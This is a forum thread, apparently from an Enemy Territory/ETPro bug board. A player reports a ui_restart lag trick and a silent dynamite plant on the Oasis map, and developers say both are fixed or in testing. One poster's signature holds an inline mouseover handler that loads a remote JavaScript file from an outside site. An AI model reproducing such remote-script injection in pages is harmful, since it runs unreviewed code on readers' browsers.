ui_restart && silent plant @ oasis

Discussion for any ET/ETPro/BayonET bugs or cheats you find...

Moderators: Forum moderators, developers

alpn

ui_restart && silent plant @ oasis

Post by alpn »

Hi,

I tried to look up other threads, but could not find those bugs.

1) ui_restart. ui_restart causes some lag for the player who is doing that.
With ui_restart you can pass mines without blowing them and also you can be in Oasis's waterpump as long as you want (it does not need to be fixed, and you can dive to the anti-tank guns!). Sounds great , eh? Bind ui_restart to some key and hit fordward key every time when the lag stops.

2) Silent plant at Oasis's anti tank guns. Get two players, one must prone up on the anti-tank gun, and the other one must plant the dynamite above the player. It does not tell you that dynamite is planted, but the gun will explode.

Will those bugs be fixed on ETPro 2.1?
dA*Rogue

Post by dA*Rogue »

2) Silent plant at Oasis's anti tank guns. Get two players, one must prone up on the anti-tank gun, and the other one must plant the dynamite above the player. It does not tell you that dynamite is planted, but the gun will explode.
The principle applies not just to Oasis's guns but everything AFAIK. Try dropping a mine, then dropping dynamite on it and arming it before the mine disappears, for example.
Rain

Re: ui_restart && silent plant @ oasis

Post by Rain »

alpn wrote:1) ui_restart. ui_restart causes some lag for the player who is doing that.
With ui_restart you can pass mines without blowing them and also you can be in Oasis's waterpump as long as you want (it does not need to be fixed, and you can dive to the anti-tank guns!). Sounds great , eh? Bind ui_restart to some key and hit fordward key every time when the lag stops.
We already have a fix for this in testing.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
bani
Site Admin

Post by bani »

fixed #2 tonight